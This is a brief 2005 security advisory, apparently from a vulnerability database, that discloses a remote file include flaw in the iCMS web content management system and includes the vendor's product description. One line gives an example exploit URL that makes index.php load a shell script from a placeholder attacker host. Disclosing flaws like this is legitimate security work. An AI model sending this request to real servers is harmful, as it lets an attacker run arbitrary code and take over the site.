iCMS Remote File Include Vulnerability

Type securityvulns
Reporter Securityvulns
Modified 2005-11-14T00:00:00


iCMS Remote File Include Vulnerability

Author: r0t (hackers.by.lv) Date: 14. nov 2005

software:iCMS vendor:http://www.cogilent.com/

software description: iCMS is an interactive Web Content Management System. The purpose of this product is to facilitate organizations that require power solutions to manage their growing content needs. iCMS combines powerful web content management with the facility to tailor deployments according to the client's requirements. With this solution organizations can have an up and running CMS based web content system in less than a month's time. Also with this solution the technical manpower required by organizations to develop, deploy and manage their web content can be reduced from a whole team to a single person.

Vulnerability Description: attacker can include from remote host files with wich can exploit all system.

example: /index.php?page=http://attacker.host/shell.txt?

Greetings: der4444,fredrau,g0df4th3r,RaZbH,cembo,waraxe,new angels team ,netsec team and all guys from hackers by lv!!!

orginal advisory discussion:http://hackers.by.lv/showthread.php?p=416